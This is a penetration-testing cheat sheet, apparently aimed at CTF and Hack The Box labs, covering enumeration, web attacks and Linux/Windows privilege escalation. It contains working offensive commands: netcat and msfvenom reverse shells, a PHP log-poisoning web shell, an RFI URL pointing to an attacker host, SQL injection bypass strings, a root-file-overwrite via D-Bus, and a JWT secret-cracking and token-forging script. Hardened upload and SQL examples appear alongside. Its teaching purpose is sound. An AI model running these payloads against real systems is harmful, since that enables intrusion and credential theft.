Linux | Windows Privilege Escalation Cheat Sheet by blacklist_


Transcript of Linux | Windows Privilege Escalation Cheat Sheet by blacklist_

Linux | Windows Privilege Escalation Cheat Sheet by blacklist_ via cheatography.com/121658/cs/22362/

HTTP Status Codes

Code (as reported by Gobuster) / Status

2XX Success: the request was received, understood and accepted.

3XX Redirection: the client must take additional action to complete the request (follow the Location header; gobuster typically reports 301 for a directory requested without its trailing slash).

4XX Client Error: the error appears to have been caused by the client. 401/403 are still worth noting: the path exists, you just cannot reach it yet.

5XX Server Error: the server failed on an apparently valid request; often worth revisiting with different input.

https://www.restapitutorial.com/httpstatuscodes.html

Cyber Kill Chain

Usage / Syntax

View Source Code

Read it (enumeration/directory). Read hints carefully and use the find and locate commands.

Gobuster / Dirb / DirBuster

Directory brute force.

Nmap Scan

-A (aggressive: OS detection, version detection, default scripts, traceroute) -p- (all 65535 ports)

Steganography

https://0xrick.github.io/lists/stego/

FTP

Penetration testing of the FTP port. Logins can be brute forced using hydra (check for anonymous login first). ftp <ipaddr> to connect, then get <file> to download files.

Think like a hacker

What can I do from here? Where can I look (any hints given)?

Cyber Kill Chain (cont)

Common Username/Password

admin:admin, admin:admin123, admin:password, root:password, root:root and admin:fileserver

Web shell

Gives us remote administration of the target web server. As web admin we can add or modify data (deface the site). So after we get admin access to the web site, the aim is to get access to the web server itself (an OS-level shell).

Information Gathering

Search the website for blog posts with names that can be used as usernames. Gather information and think how it can be used. If you need an email address, work out the naming format in use, such as initials@domain_name.

Directory Enumeration Wordlists

DirBuster medium (directory-list-2.3-medium.txt), Dirb common (common.txt), rockyou (passwords)

Steghide and Binwalk

steghide embeds and extracts data in JPEG, BMP, WAV and AU files (it does not support PNG); binwalk scans any file for embedded or appended files, so a zip concatenated after a PNG's IEND chunk shows up with binwalk -e. In practice: try binwalk on PNG, steghide on JPG.

Identify hash

hashid '<hash>' and the ciphey tool

Terminate hashcat session

rm -rf ~/.hashcat/sessions/hashcat.pid (removes the stale pid file when hashcat refuses to start because it thinks a session is already running)

Nmap script scans

nmap -sV -A --script vuln <ip>

JWT CRACK

hashcat -a 0 -m 16500 crack.txt rockyou.txt (crack.txt holds the full token header.payload.signature; mode 16500 is JWT with HMAC signing, so it only applies to HS256/HS384/HS512 tokens, not RS256 ones where there is no shared secret to guess)
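As an added example (not code from the cheat sheet), the Python script below does by hand what hashcat -m 16500 automates: it recomputes the HMAC-SHA256 over header.payload for each candidate secret, compares it with the token's signature, and, once the secret is recovered, re-signs a modified payload. The sample token, its weak secret "password123" and the five-word wordlist are constructed inline so it runs offline.

```python
"""Offline HS256 JWT secret brute force and re-signing (what hashcat -m 16500 automates).

Added example, not part of the original cheat sheet. The sample token, its weak
secret and the wordlist are all constructed inline so the script runs offline.
"""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build header.payload.signature for HS256 (used to construct the sample and to forge)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose HMAC-SHA256 over header.payload matches the signature."""
    header_b64, body_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if alg != "HS256":
        # RS256/ES256 tokens are signed with a private key; there is no shared secret to guess
        raise ValueError(f"not an HS256 token (alg={alg})")
    signing_input = f"{header_b64}.{body_b64}".encode()
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        guess = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def decode_payload(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


# --- constructed sample: a guest token signed with a weak secret ---
SAMPLE_SECRET = "password123"
SAMPLE_TOKEN = sign_hs256({"user": "guest", "admin": False}, SAMPLE_SECRET)
SAMPLE_WORDLIST = ["123456", "password", "letmein", "password123", "qwerty"]


def forge_admin(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Crack the secret, then re-sign the same claims with admin set to True."""
    secret = crack_hs256(token, wordlist)
    if secret is None:
        return None
    claims = decode_payload(token)
    claims["admin"] = True
    return sign_hs256(claims, secret)


if __name__ == "__main__":
    print("secret:", crack_hs256(SAMPLE_TOKEN, SAMPLE_WORDLIST))
    print("forged:", forge_admin(SAMPLE_TOKEN, SAMPLE_WORDLIST))
```

With a real token, pass the file object of rockyou.txt as the wordlist; the check is the same one the server performs on every request, which is why a guessable secret is equivalent to no signature at all.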

By blacklist_, cheatography.com/blacklist/

Not published yet. Last updated 27th February, 2021. Page 1 of 25.

Sponsored by Readable.com (Measure your website readability! https://readable.com)


Cyber Kill Chain (cont)

HTTP running

dirb; try HTTPS; //<ip> (double slash); robots.txt; page source

Wordpress

https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/
https://blog.wpscan.org/assets/posts/wpscan-posters/WPScan_CLI_Cheat_Sheet.pdf

Wordpress - get reverse shell

Username enumeration, brute force the password, log in and upload a shell to get a session. To upload a PHP shell either upload it as a PLUGIN or edit a theme file: an exploitDB PHP plugin, MSF php/reverse_tcp, or the pentestmonkey PHP reverse shell can be uploaded. https://www.hackingarticles.in/wordpress-reverse-shell/

File Upload Bypass & PentestMonkey Shell

Intercept the request, play with it and check the response: this is highly important. Collections of web-shell guides: HackTricks (bypass file upload) and the Hacker's Grimoire book. Following HackTricks, first try every single extension, then try double extensions, or use Burp Suite (Intruder) to brute force them.

Cyber Kill Chain (cont)

Bypass File Upload

Download the pentestmonkey PHP reverse shell and put GIF89a on its first line (a fake GIF magic header). Change the extension (e.g. to .gif) and upload it; it uploads but won't execute as PHP. Upload it again, this time intercepting with Burp; edit the request and change the filename to .gif.php. Done: request the shell through its PATH and use nc to catch the connection.
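As an added illustration in Python (not code from the cheat sheet or any real CMS; the validators, the file names and the sample bodies are constructed), here is the kind of upload check that the .gif.php trick above defeats, next to a hardened one that looks only at the last extension, requires matching magic bytes and never stores the file under the attacker's name.

```python
"""Upload checks: the naive one the .gif.php trick defeats, and a hardened one.

Added example; the validators and sample files are constructed for illustration,
not taken from the cheat sheet or any real CMS.
"""
import os
import secrets

# final extension -> magic bytes the body must start with
ALLOWED = {".gif": b"GIF8", ".png": b"\x89PNG", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}

# constructed: a pentestmonkey-style shell with a fake GIF header on line one
SHELL = b"GIF89a\n<?php system($_GET['cmd']); ?>\n"
# constructed: the first bytes of a genuine 1x1 GIF
REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16


def upload_vulnerable(filename: str, content: bytes) -> str:
    """Accepts if an image extension appears anywhere in the name and the body has GIF magic.

    Both hold for shell.gif.php, and the file is stored under the user-supplied
    name, so the web server hands it to the PHP handler when it is requested.
    """
    if any(ext in filename.lower() for ext in ALLOWED) and content.startswith(b"GIF8"):
        return filename
    raise ValueError("rejected")


def upload_safe(filename: str, content: bytes) -> str:
    """Only the LAST extension counts, the magic must match it, and the stored name is ours."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    if not content.startswith(ALLOWED[ext]):
        raise ValueError("content does not match declared type")
    if b"<?" in content:
        raise ValueError("embedded PHP tag")  # cheap extra check; magic bytes alone prove nothing
    return secrets.token_hex(8) + ext  # server-chosen name, never the attacker's


def rejected(validator, filename: str, content: bytes) -> bool:
    """True if the validator refuses the upload."""
    try:
        validator(filename, content)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive stores  :", upload_vulnerable("shell.gif.php", SHELL))
    print("hardened blocks shell.gif.php:", rejected(upload_safe, "shell.gif.php", SHELL))
    print("hardened stores cat.gif as   :", upload_safe("cat.gif", REAL_GIF))
```

The server-chosen name also matters because a .gif extension alone is not safe on a server whose handler is configured with a loose AddHandler pattern; the hardened version's defence is the combination of the three checks, not any one of them.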

Spot DBus in SUID files

Execute this command to copy our authorized_keys file (holding our public key) over root's .ssh/authorized_keys, so we can log in over SSH as root:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true

If the reply is () (an empty tuple), the method call was accepted and the copy ran as root.

DBus

D-Bus is the inter-process message bus (system and session buses); services such as com.ubuntu.USBCreator register on it and their helper processes run as root. The usb-creator helper's Image method copies the source path to the destination as root without checking either, so any user permitted to call it can overwrite root-owned files. When a root-owned or SUID helper shows up in enumeration, check which D-Bus methods it exposes and whether the current user is allowed to call them.


Cyber Kill Chain (cont)

Brute force vhosts / subdomains using FFUF

ffuf -w SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://undiscovered.thm/ -H "Host: FUZZ.undiscovered.thm" -fc 302

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://delivery.htb/ -H "Host: FUZZ.delivery.htb" -fw 486

-fc filters out responses by status code and -fw by word count: run once without a filter, note the status/word count of the default vhost response, then filter that out. To learn more visit the FFUF docs.

Fuzzing / Filtering

Brute forcing directories along with extensions

gobuster dir -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 42 -x .bak,.php

Fuzzing vs Bruteforce

Brute forcing is an attack method of simply trying all candidates, e.g. every password in a list. Fuzzing is a method of sending malformed or abnormal data to a service in an attempt to get it to misbehave in some way, which could lead to the discovery of vulnerabilities such as denial of service, buffer overflows or remote code execution. FUZZ can be done for subdomains too, and for sending payloads to find LFI or RCE.

Linux Escalation Techniques -> http://xiphiasilver.net/2018/04/26/annotation-abusing-sudo-linux-privilege-escalation/#disqus_thread

Web enumeration -> https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html

Cyber Kill Chain (Windows)

Usage / Syntax

Nmap -> Service Enumeration

The services running help us identify the next steps. Kerberos on port 88 means we can try a Kerberos pre-authentication attack (AS-REP roasting). If many services are running, try enum4linux. Website: upload a shell and access it.

nmap -sV --script=nfs-showmount <target>

Nmap script scan, and an nmap scan of port 2049 (NFS).

NFS (mount the drive to access it)

Network File System permits a user on a client machine to mount shared files or directories over a network. showmount -e <target>

Mount the content of a shared folder: -t (type) nfs/iso

mount -t nfs ip:/drive_name /mnt/folder_name

It may be possible to mount the root export with :/ and then navigate to other folders such as root. To detach a busy device immediately: umount -l <mountpoint>, then delete the contents.

Google where the CMS (Umbraco) stores credentials

App_Data/Umbraco.sdf: the .sdf extension is a SQL Server Compact database file storing data in a structured binary format. Credentials can be grepped out of it: cat Umbraco.sdf | grep admin (or strings Umbraco.sdf | grep admin, since the file is binary)


Cyber Kill Chain (Windows) (cont)

Hashcat to crack password hash

hashcat -a 0 -m 100 crack.hash /usr/share/wordlists/rockyou.txt (-m 100 is raw SHA1; pick the mode from hashid or the hashcat example-hashes wiki)

Whenever you get an interface, try to find an upload panel

Upload a reverse shell, then browse to its directory to execute it on the remote machine and get the reverse shell.

Windows reverse shell payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.89 LPORT=4455 -f exe > blacklist.exe

Upload it.

C:/Inetpub (use the CVE exploit to browse to and access the payload) 'ls C:/'

Inetpub is the default folder for Microsoft Internet Information Services (IIS). Website content and web apps are stored under inetpub (e.g. C:\inetpub\wwwroot), so files uploaded through the site land there and are reachable by URL.

Access the payload

python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'C:/inetpub/wwwroot/media/1034/blacklist.exe'

Listen for connection

use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST <our ip>
set LPORT <port>
run

The handler's payload, LHOST and LPORT must match what msfvenom generated: for the blacklist.exe above that is windows/meterpreter/reverse_tcp on 10.10.14.89:4455, and an x64 shell handler will not catch a 32-bit meterpreter stager.

Upload Winpeas and access using CVE

Privilege Escalation Awesome Scripts

Cyber Kill Chain (Windows) (cont)

In the winPEAS Applications area we can see TeamViewer; check it from the shell. Use metasploit to grab its stored credentials:

run post/windows/gather/credentials/teamviewer_passwords

Evil-Winrm: WinRM Pentesting Framework

Evil-WinRM is a PowerShell remoting shell for hacking, so it belongs to the post-exploitation phase: it needs valid credentials (or an NTLM hash) for a user allowed to use WinRM (ports 5985/5986). Its purpose is to provide nice and easy-to-use features for pentesting.

Evil Winrm

evil-winrm -u Administrator -p '!R3m0te!' -i '10.10.10.180'

Enum4linux

Enum4linux is an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems, including Samba (SMB) hosts on a network. Enum4linux can discover: password policies on a target, the operating system of a remote target, shares on a device (drives and folders), domain and group membership, and user listings.


Cyber Kill Chain (Windows) (cont)

GetNPUsers (impacket script)

GetNPUsers.py <domain_name>/ -dc-ip <ip>

GetNPUsers.py performs AS-REP roasting. For accounts with Kerberos pre-authentication disabled, the KDC returns an AS-REP encrypted with the user's password-derived key without any authentication, and that blob can be cracked offline (hashcat -m 18200). Username and password are optional: with a user list (-usersfile) and no credentials it identifies vulnerable accounts; with valid domain credentials it asks the DC for the full list. Use this script to identify vulnerable accounts.

Domain Controller, Active Directory

A Windows Domain allows management of large computer networks. They use a Windows server called a DC (domain controller). A DC is any server that has the Active Directory Domain Services role. DCs respond to authentication requests across the domain. DCs have the tools AD (Active Directory) and GP (Group Policy). AD contains objects and OUs (Organizational Units). GP contains GPOs (Group Policy Objects) that manage settings for AD objects.

Kerberos Cheatsheet

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

SMB (netbios-sn)

SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares.

Cyber Kill Chain (Windows) (cont)

SMB enumeration

smbclient -L <ip> to list shares, then access one: smbclient //192.168.1.108/share_name

Notes in Kali: Windows Priv. Esc.

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
https://book.hacktricks.xyz/windows/active-directory-methodology

Reverse Shell & Exploitation Techniques

Usage / Syntax

Linux privilege cheatsheet

https://guide.offsecnewbie.com/privilege-escalation/linux-pe#cron-jobs, HackTricks, Hacking Articles

OSCP Cheatsheet

https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html
https://vulp3cula.gitbook.io/hackers-grimoire/

Linpeas, LinEnum, Linux exploit suggester

Linpeas - work through the HackTricks checklist. SUID command: find / -perm -u=s -type f 2>/dev/null. sudo -l. Cron jobs: cat /etc/crontab

Netcat

nc -e /bin/sh <ipaddr> <port> (on the target)
nc -lvp <port> (on our host)

msfconsole | Cheatsheet

Power up metasploit (Metasploit Cheatsheet on GitHub). Reverse shell: msfconsole

use exploit/<path>   specify the exploit to use
show options         then set the specific options
show targets         (set target <no>)
set the specific target, e.g. PowerShell, PHP, Python


Reverse Shell & Exploitation Techniques (cont)

Connect to the RDP service using an RDP client (Windows)

3389: RDP. Start Remmina, enter the IP address, then enter username, domain and password.

Linux Privilege Escalation

SUID binary

find / -perm -u=s -type f 2>/dev/null

If you want to escalate to another user, search for files that user owns: there might be a cron job that executes their file, where we can place a reverse shell. find / -type d -group <user_name> 2>/dev/null (or -user <user_name> for files owned by them)

Cron Jobs

Transfer pspy64 through a python HTTP server to find cron jobs (pspy shows processes as they spawn, without needing root).

sudo -l

Shows exactly which commands you are authorized to run, and as which user.

SUID binary Automation Script

SUID3NUM.py. Custom binaries can be opened and reversed using Ghidra.

Add machine IP to /etc/hosts

echo 10.10.194.183 spookysec.local >> /etc/hosts

Reverse Shell & Exploitation Techniques (cont)

Cron Jobs (time-based job scheduler)

Mostly we try to add our reverse shell into the file that the cron job executes; when cron runs it we get the reverse shell. If the cron job calls out to a hostname, we can also try to change /etc/hosts so the name resolves to our IP, open an HTTP server on our machine and let it fetch and execute our own reverse shell script.

Exploiting sudo -l

sudo -l shows www-data may run /var/www/gdb as user thirtytwo; escalate to that user with the GTFOBins gdb entry:

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

Exploiting sudo -l

(d4rckh) NOPASSWD: /usr/bin/git. We have a user who can execute git as d4rckh, so escalate through git's pager (GTFOBins):

sudo -u d4rckh /usr/bin/git -p help config
then at the pager prompt type: !/bin/sh

Escalate privilege via cron job of a python script

https://blog.razrsec.uk/tryhackme-tartarus/

Exploiting SUID

A find binary with the SUID bit set means we can run find as root. Using the -exec flag we can run any command as root, for example changing the permissions of the root directory:

$ find . -exec chmod 777 /root \;


Reverse Shell & Exploitation Techniques (cont)

Su VS Sudo

su is permanent privilege escalation: it switches the whole shell to another user account (root by default) and stays there until you exit. sudo is temporary privilege escalation: it runs one command as the superuser (or another user with -u) and returns to the current user as soon as the command completes. sudo -s or sudo su gives a persistent root shell via sudo.

Privilege escalation, 2 more ways

Privilege escalation using capabilities (getcap -r / 2>/dev/null). Privilege escalation using Python library hijack (a writable module directory or PYTHONPATH consulted by a privileged script).

Upload tools and stuff - https://prune2000.github.io/post/upload-tools/

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Windows cmd commands

Discover users

net user

Read text file

type root.txt

List directory content

dir

Change directory

cd

Read file permission and owner

Right click > Properties > Details > Owner. Go to the Security tab > Edit permissions > Add > enter the name of the user you want to give permission to. (From the command line: icacls <file>.)

Upgrade Command Shell to Meterpreter

sessions -u <no>, or use post/multi/manage/shell_to_meterpreter

Metasploit: get hashes of users

hashdump

Linux Directory Structure

Directory Name / Usage

When basic privesc doesn't work, search these directories for juice

/opt & /var -> www & log & backups. Make sure you review the Linpeas output properly, e.g. "Readable files belonging to root and readable by me but not world readable".

/opt

/opt is a directory for installing unbundled packages (i.e. packages not part of the operating system distribution but provided by an independent source), each one in its own subdirectory. Sometimes config files with credentials can be found here. Other installed-software locations: /usr/local.

/var

/var contains things that are prone to change, such as websites (/var/www), temporary files, logs, config and databases.

/bin (system commands)

/bin contains executables required by the system for emergency repairs, booting and single-user mode. /usr/bin contains the binaries that aren't required for that.

/usr/bin (executable commands)

This is the primary directory of executable commands on the system.

/etc

Look out for logs, backups and config files.


OWASP TOP 10 and others

Vulnerability - along with its mitigation / Hunt down

SQL injection

test' or 1=1; --   The ' closes the string literal in the query, ; terminates the statement and -- comments out the rest. For example, registering an account whose name is blacklist' -- lets us later alter any query the application builds from that stored username.

Second-order SQL

The registration itself is safe, so the name blacklist' -- is stored verbatim. Later the application builds another query from the stored value without escaping, e.g. UPDATE users SET password = "newpass" WHERE username = "blacklist' --" AND password = "current password". Everything after -- is now a comment, so the AND password check disappears and the password of the existing user named blacklist is changed directly, without knowing the current one.

SQL Mitigation

Parameterized statements: don't put the input variable directly into the SQL statement; pass it separately as a bound parameter so the driver never treats it as SQL. Vulnerable: "SELECT * FROM users WHERE email = '" + email + "'". Sanitizing inputs is a second line of defence, not a replacement.
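The three points above (login bypass, second-order injection through a stored username, and the parameterized fix) worked through on an in-memory SQLite database, as an added example that is not code from the cheat sheet. The table, the two users and their passwords are constructed; the payloads are the ones the sheet lists.

```python
"""Login bypass, second-order injection and the parameterized fix, on an in-memory SQLite DB.

Added example, not taken from the cheat sheet. The table, the users and their
passwords are constructed here; the payloads are the ones the sheet lists.
"""
import sqlite3


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "S3cret!"), ("blacklist", "guestpw")])
    db.commit()
    return db


def login_vulnerable(db, username: str, password: str):
    # string concatenation: the quote in the input closes the literal, -- comments out the rest
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    # bound parameters: the values travel separately from the SQL text, so quotes are just data
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def register(db, username: str, password: str) -> None:
    # registration is parameterized, so a name such as  admin' --  is stored verbatim
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    db.commit()


def change_password_vulnerable(db, username: str, new_password: str) -> None:
    # second-order: the username read back from the attacker's own account record is
    # trusted and concatenated into a new statement; the -- eats the WHERE clause's tail
    db.execute(f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'")
    db.commit()


def change_password_safe(db, username: str, new_password: str) -> None:
    db.execute("UPDATE users SET password = ? WHERE username = ?", (new_password, username))
    db.commit()


def stored_password(db, username: str) -> str:
    return db.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    print("bypass  :", login_vulnerable(db, "test' OR 1=1 --", "anything"))  # a user, no password
    print("fixed   :", login_safe(db, "test' OR 1=1 --", "anything"))         # None
    register(db, "admin' --", "attacker-pw")
    change_password_vulnerable(db, "admin' --", "pwned")                       # hits admin's row
    print("admin pw:", stored_password(db, "admin"))
```

The second-order case is the one input sanitizing at the login form misses entirely: the dangerous value never arrives in the request that breaks, it arrives from the database. Binding parameters in every statement, not just the ones that take form input, is what closes it.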

SSRF

LFI / RFI

S3 bucket

IDOR

Enumeration Checklist

Usage / Syntax

Attention to detail

Is something odd, like text at the end of a page? Does everything make sense, like a password? Look out for possible usernames, directories, information. Focus should also be on understanding the application you are enumerating, how it works and what is going on. Connect the dots: e.g. telnet might be running an .exe which is vulnerable to a buffer overflow.

Starting Enumeration

ifconfig. Host discovery: nmap -sn <ip>/24. Explore each service running and grab banners using netcat: nc -nv <ip> <port>. Find out whether the service version has any known vulnerability via Google and searchsploit. What do we have and what can be done? e.g. we might already have a directory which can be FUZZed further. Pentest <service>: HackTricks / Hacking Articles.


Enumeration Checklist (cont)

HTTP / HTTPS 80 & 443

Try https; robots.txt; /* source code review; directory enumeration; vulnerabilities like LFI, SQL (every vulnerability has its indicators); extension check; double /-FUZZ- on paths and parameters. Play with Burp requests to understand application flow, and play with headers: X-Forwarded-For can be used to bypass rate limits or IP bans.

More Port 80 / HTTPS checklist

Is it a CMS? Nikto for web vulnerability scanning. Discover whether the website serves /index.php or /index.html. An id in the URL: FUZZING can lead to directory traversal or LFI. If given a domain name, try brute forcing subdomains / vhosts. Wild guess: if there are 2 http ports open, one service might impact the other, or leak information. Login form: hunt for usernames, brute force, SQL injection bypass on both User & Pass parameters = admin' OR '1'='1;--+

Enumeration Checklist (cont)

FTP

Anonymous login, brute force, CVE. cd ... ; dir returns a full directory listing whereas ls -al returns hidden files in a simplified listing. Google the version for exploits or vulnerabilities. PUT files on the server and use the http server to trigger them. After login: which directory are you in? Are the files owned by root? Try cd ..

CMS

Hunt for the admin panel. Login panel: default creds for that service and a small brute force of common creds. Aim for usernames and passwords. Always read source, https, robots and dirb. Always study that CMS: upload path and other important directory names. FUZZ for subdomains via ffuf. Hunt the CMS version and search for an exploit / vulnerability for that version.


Enumeration Checklist (cont)

Directory Enumeration

gobuster dir -u http://10.10.97.63/ -w /usr/share/wordlists/raft-large-directories-lowercase.txt -t 40 -x php,bak,txt

Always use the raft and 2.3-medium wordlists for brute force. Remember to specify the extension check. /example/{{fuzz}}: remember to FUZZ double directories too.

Service Enumeration

Enumerate the service. Find the login page, i.e. the directory path where the login page for that service is located. Check out YouTube and others for exploiting that service.

Enumeration tip

After getting a shell as www-data always check /var/www, and save the current user's private key (e.g. /home/paul/.ssh/id_rsa); we might be able to log in as another user directly.

HTTP Directory Enumeration

3 wordlists: common.txt, dirbuster/directory-list-2.3-medium.txt, seclists/raft-large-directories-lowercase.txt

dirsearch -u 10.0.2.19 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '*' -t 50

Enumeration Checklist (cont)

Database Penetration Testing (SqlMap)

Always look out for an id in the URL; it is probably backed by a database and may be vulnerable to SQL injection. sqlmap -u "http://10.0.2.6:8080/mercuryfacts/1" --dbs --batch (Guide: sqlmap)

Enumerate login forms, id values and parameters for SQL vulnerabilities via a Burp request or sqlmap.

Upgrading a Simple Shell to Fully Interactive (TTY)

python -c 'import pty; pty.spawn("/bin/sh")'

Enumeration Scripts

LinEnum, Linpeas, LES (Linux exploit suggester), pspy64 or pspy32

Netstat on the victim machine

To view incoming and outgoing connections; might find a listening port that did not show up in the scan (bound to localhost or firewalled): netstat -tulpn

Sqlmap to perform enumeration (Banner Grabbing)

Capture the Burp request and test it on login forms. Command: sqlmap -r <request>.txt --dbs

SQL - important files (HackTricks), cleartext .mysql_history in the /home dir

The output comes up with the list of databases on the remote server. https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Cipher Identifier and Analyzer

https://www.boxentriq.com/code-breaking/cipher-identifier

Password Hash Cracker

https://crackstation.net/

Vigenere cipher (long text vulnerable)

https://www.guballa.de/vigenere-solver

All in one Decoder

https://gchq.github.io/CyberChef/


Enumeration Checklist (cont)

Cipher and Hash identification

https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html Printable ASCII is decimal 32-126 (letters roughly 65-122); "ABC" in hex is 41 42 43. Decimal and binary; Base64 is digits plus upper and lower case letters (often ending in =); MD5 is lower-case hex, 32 characters long.

Find files with common extension

find / -name "*.txt" 2>/dev/null

Hashcat

The crypt formats all have a prefix: $1$ is md5crypt, $2$ (also $2a$, $2b$, $2y$) is bcrypt, $5$ is sha256crypt, $6$ is sha512crypt (hashcat -m 500, 3200, 7400 and 1800 respectively). Ciphey tool and the hashcat wiki.

/etc/shadow File

Understanding the /etc/shadow file: https://linuxize.com/post/etc-shadow-file/

THM Cryptography Room - RSA tool

PGP stands for Pretty Good Privacy. It is software that implements encryption for encrypting files, performing digital signing and more. Similarly we have GPG, the open-source implementation, and you can decrypt a file using gpg (gpg --import key.asc, then gpg --decrypt file.gpg).

Enumeration Checklist (cont)

Another tip for service enum

Most privilege escalation from www-data to a user is through a hash or some given password, so enumerate the files of that service: where are the database files stored inside this service, or where is the users' info stored.

Copy all files into a single file

cat * > blacklist.txt

LFI / RFI Final Cheatsheet, Detailed Attack Vectors, File Inclusion / Directory traversal, PayloadsAllTheThings

Cheatsheet: File Inclusion Attacks; File Inclusion: HackTricks


Enumeration Checklist (cont)

File Inclusion Attacks

In an RFI attack, the attacker makes the web server include a remotely hosted file (their own script). In an LFI attack, the attacker uses files already on the server to execute a malicious script. For LFI, a web browser alone is enough to carry out the attack.

Local File Inclusion (LFI) is very similar to RFI. The only difference is that in LFI, instead of including remote files, the attacker has to use local files, i.e. only files already on the server can be used to execute a malicious script. Since this vulnerability can be exploited with only a web browser, LFI can still lead to remote code execution by including a file containing attacker-controlled data, such as the web server's access logs (log poisoning).

Remote File Inclusion (RFI) is a method that allows an attacker to make the server include a remotely hosted file. The vulnerability is largely found on websites running PHP, because PHP supports the ability to include or require additional files within a script (and, with allow_url_include enabled, from a URL). The use of unvalidated user-supplied input in these include statements is what makes it exploitable.

Enumeration Checklist (cont)

LFI local file inclusion

If you find a parameter like /index.php?plot=, try fuzzing it manually or with Burp. LFI (local file inclusion) is a vulnerability which an attacker can exploit to include/read files. Therefore, whenever you see a PHP website try FUZZING, as these are sometimes vulnerable to LFI or RFI. Use directory traversal (../../) as well.

LFI vulnerability

Log poisoning is a common technique used to gain a reverse shell from an LFI vulnerability. To make it work the attacker injects malicious input into the server log and then includes the log. Add the "?page=" parameter and try reading the Apache log file, located at /var/log/apache2/access.log. Fire up Burp Suite, intercept the request and insert the following malicious code in the User-Agent field (the PHP command lets us execute system commands by passing the input through a GET parameter called lfi). The link becomes:

http://<IP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=<command>

Now you can execute commands on the system!


Enumeration Checklist (cont)

Log poisoning attack vector through LFI is possible using directory traversal and other ways like SMTP (mail logs)

Forward the request and add your parameter to the link (in my case lfi).

User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/68.0

lfi.php?page=/var/log/apache2/access.log&lfi=cd /home;cd lfi/;cat flag.txt;ls -lap;uname -r;ls -la

RFI/LFI (by specifying the path we can even read the user and root flags if the server runs with root permissions)

Look out for parameters. To put it another way: the page we are looking at is actually empty; it includes content from another page. Local File Inclusion is when that input isn't properly sanitised, allowing us to manipulate the link to open other files; in the case of RFI we can supply an external URL and gain a shell.

RFI

http://example.com/?file=http://attacker.example.com/evil.php

In this example the malicious file is included and run with the privileges of the user the web application runs as. That allows an attacker to run any code they want on the web server, and even gain a persistent presence on it.
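The LFI, log-poisoning and RFI rows above all come down to one include routine that trusts its parameter. As an added example (not code from the cheat sheet), here is that routine in Python beside a hardened version: the vulnerable one shows why both ../ traversal and an absolute path such as /var/log/apache2/access.log reach files outside the page directory, and the safe one refuses URLs, resolves the real path and keeps it inside an allowed directory with an allowed suffix. The web root, the page and the stand-in "secret" file are constructed in a temporary directory.

```python
"""A page-include routine built the way an LFI/RFI-vulnerable PHP script builds it, and a hardened one.

Added example; the web root, page names and "secret" file are constructed in a
temporary directory so it runs offline. Not code from the cheat sheet.
"""
import os
import tempfile


def build_webroot() -> str:
    """Constructed layout: <root>/pages/home.php is includable, <root>/secret.txt is not."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "home.php"), "w") as f:
        f.write("<h1>home</h1>")
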